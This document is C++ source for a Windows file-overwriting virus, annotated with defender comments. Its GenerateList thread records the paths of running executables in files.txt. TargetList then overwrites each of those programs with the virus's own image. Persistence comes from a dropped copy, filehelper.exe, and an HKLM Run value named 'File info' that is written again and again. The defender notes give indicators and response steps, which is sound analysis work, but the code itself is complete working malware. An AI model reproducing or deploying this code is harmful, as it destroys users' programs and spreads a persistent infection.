- #include <iostream>
- #include <windows.h>
- #include <Tlhelp32.h>
- #include <string>
- #include <fstream>
- #include <direct.h>
// File-scope state shared by every function in this listing.
// startupStr and winDirStr are filled in by config(): the first ends up holding the path of the
// dropped copy (filehelper.exe), the second the path of the target list (files.txt).
// `accessed` is set by the GenerateList thread while it rewrites files.txt and is read by TargetList.
- std::string startupStr;
- std::string winDirStr;
- HKEY hKey; // RegSet() declares its own local hKey; no visible code uses this global
- bool accessed = false;
// RegSet: persistence step. Opens HKLM Software\Microsoft\Windows\CurrentVersion\Run with
// KEY_SET_VALUE and writes a REG_SZ value named "File info" whose data is the path in startupStr.
// Defender note: a Run value named "File info" that points into "Program Files\OpenSV" is a direct
// indicator of this sample; auditing writes to this Run key will surface it.
// RegSet() is called from config(), from TargetList()'s fallback branch and from every GenerateList()
// pass, so the value is written again after deletion for as long as a copy of the process is running.
- void RegSet() { //Just add %:\Program Files\OpenSV\filehelper.exe to startup
- char startup[MAX_PATH] = "";
- strcat(startup, startupStr.c_str());
- HKEY hKey;
- RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey);
- RegSetValueEx(hKey, "File info", 0, REG_SZ,(const unsigned char*)startup, sizeof(startup));
- RegCloseKey(hKey);
- }
// TargetList: destructive step. Reads the list file (winDirStr, i.e. files.txt) line by line and calls
// CopyFile(self, line, false) for each entry, where `self` is the path of the running image; the
// third argument (bFailIfExists = false) means an existing file at that path is replaced.
// If either files.txt or the dropped filehelper.exe cannot be opened, it instead re-copies the
// running image to startupStr and re-registers the Run value through RegSet().
// Defender note: an overwritten executable keeps its original name and path but now holds this
// program's bytes, so the original content is gone and has to be restored from known-good media
// or backup. Many .exe files sharing one hash, and a single process issuing writes to many unrelated
// .exe paths, are the observable signs of this routine.
- int TargetList() {
- HMODULE GetModH = GetModuleHandle(NULL);
- char self[MAX_PATH]; // }___Create char self and then apply the THIS .exe's path and name to it.
- GetModuleFileName(GetModH, self, sizeof(self));// }
- std::ifstream TarListIn;
- std::ifstream exeCheck;
- std::string targetPath;
- TarListIn.open(winDirStr.c_str(), std::ios::in);
- exeCheck.open(startupStr.c_str(), std::ios::in | std::ios::binary);
- std::getline (TarListIn, targetPath);
- //std::cout << "\"" << path << "\"" << std::endl;
- //std::cin.get();
- if(TarListIn.is_open() && exeCheck.is_open()) { //If files.txt AND filehelper.exe (.exe list and infection .exe) exist, continue.
- while(!TarListIn.eof()) { //While we havent reached the end of the list, do..... *.eof also advances the current line being read in the txt file.
- if(accessed) { //If GenerateList declares files.txt as being accessed, hold off for 100 ms (to avoid high cpu usage) and then re-run TargetList
- Sleep(100);
- TargetList();
- return 0; //We dont want it to run twice+, do we?
- }
- std::getline (TarListIn, targetPath); //Each running .exe's path is put in its own line. Read the current line, and....
- CopyFile(self, targetPath.c_str(), false); //...copy it from self (current running infection file) to targetPath, overwriting it.
- Sleep(50); //Why not?
- //DeleteFile(path.c_str());
- }
- TarListIn.close(); //Close files.txt
- } else { //NOW, if either files.txt OR filehelper.exe were not found, lets RECOPY THEM =D
- CopyFile(self, startupStr.c_str(), false);
- RegSet(); //Add %:\Program Files\OpenSV\filehelper.exe to startup, for "startup rinsing"
- Sleep(100); //A good 100ms never hurts
- }
- }
// GenerateList: thread routine started from main(). In an endless loop it takes a Toolhelp process
// snapshot, opens a module snapshot per process, takes the szExePath reported for it, and writes
// every path that contains a backslash to the list file (winDirStr, i.e. files.txt). Each pass also
// calls RegSet() and ends with a 10 second sleep.
// Defender note: files.txt under "Program Files\OpenSV" is a plain-text record of the executables
// this sample has queued; during response it gives the set of files to verify against known-good
// hashes. Because RegSet() runs on every pass, the process has to be stopped before the Run value
// and the dropped files are removed, otherwise they are written again within one cycle.
- DWORD WINAPI GenerateList(LPVOID) {
- while(true) {
- std::ofstream TarListOut;
- std::string filePath;
- PROCESSENTRY32 sEntry;
- MODULEENTRY32 mEntry;
- HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); //Gets snapshot of running processes
- HANDLE ModSnap;
- std::string path;
- sEntry.dwSize = sizeof(PROCESSENTRY32);
- mEntry.dwSize = sizeof(MODULEENTRY32);
- ModSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, sEntry.th32ProcessID);
- Module32First(ModSnap, &mEntry);
- RegSet();
- accessed = true; //TargetList() checks this value, when true (.txt being written to) it will not try to read from the file
- TarListOut.open(winDirStr.c_str(), std::ios::out);
- while(Process32Next(snapshot, &sEntry)){ //One by one, add the path of the .exe to the text file, and proceed to the next running .exe
- ModSnap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, sEntry.th32ProcessID); //Assigns snapshot to ModSnap
- Module32Next(ModSnap, &mEntry); //Move to next item in list
- filePath = mEntry.szExePath; //Put .exe into file path
- if(filePath.find("\\") < MAX_PATH) { //Most system .exe's lack the full path, only displaying .exe name. We cant overwrite these easily anyway, so...
- TarListOut << filePath << std::endl; //Writes [path].exe to TarListOut, which is files.txt ...we filter out names that lack a "\"
- }
- }
- TarListOut.close(); //Close .txt file
- accessed = false; //Allow TargetList() to continue reading from the .txt file
- Sleep(10000);
- }
- }
// config: one-time setup called first from main(). Builds the drop directory path
// "<drive>:\Program Files\OpenSV" (plus a trailing separator), creates it if GetFileAttributes reports
// it missing, then derives the two paths used everywhere else: winDirStr = <dir>files.txt and
// startupStr = <dir>filehelper.exe. Ends by calling RegSet() to register the Run value.
// NOTE(review): _getdrive() reports the process's current drive (1 = A), so the letter is that of the
// working drive rather than necessarily the Windows install drive; when hunting for the OpenSV
// directory, check every volume a copy may have been started from.
- void config() {
- startupStr = _getdrive() + 0x40; //Find windows install drive, set it to startupStr
- startupStr = startupStr + ":\\Program Files\\OpenSV\\"; //Add infection "install" directory to the drive letter
- if(GetFileAttributes(startupStr.c_str()) == INVALID_FILE_ATTRIBUTES) //If non-existent,
- CreateDirectory(startupStr.c_str(), NULL); // create the directory
- winDirStr = startupStr + "files.txt"; //.txt file listing running .exes
- startupStr += "filehelper.exe"; //Ran at startup for easy rinsing, central location that is less likely to be found or deleted.
- //MessageBox(NULL, startupStr.c_str(), winDirStr.c_str(), MB_OK);
- RegSet();
- }
- //Summary
- /*While GenerateList is fetching a list of running .exe's every ten seconds, TargetList attempts to overwrite each .exe found, repeating every one second.
- At first nothing will happen, a running .exe cannot be overwritten. When that .exe is closed, the "rinse and repeat" cycle "rinses" each non-running
- .exe, by overwriting it. Next time the user runs that program, it is merely a duplicate of the infection, and will spread further. A copy of the infection
- located in %:\Program Files\OpenSV\ starts on startup, with the list of previously-running .exes remaining in a .txt file. At a fresh start, most of the programs
- in that list won't be running, so the infection will spread to many programs at that point. It is also recopied and re-entered to the registry every time any
- instance of the infection is run. Even after successful removal, the infection can start all over if the user forgot to disinfect a single .exe somewhere, and runs it.*/
// main: entry point. Runs config() once, starts GenerateList on a second thread, then calls
// TargetList() in an endless loop with a one second pause between passes. The loop never exits,
// so the trailing return is not reached.
// Defender note: the process shows two steady behaviours that can be matched together: repeated
// process/module snapshot enumeration about every 10 seconds and repeated CopyFile calls whose
// source is the process's own image.
- int main() {
- config(); //initialize the infection
- CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&GenerateList, 0, 0, NULL); //Begin running .exe finding. Refreshes list every 10 seconds.
- while(true) {
- TargetList(); //Overwrite all exe's found with GenerateList thread. "rinse and repeat"
- Sleep(1000); //1 second(s)
- }
- return 0;
- }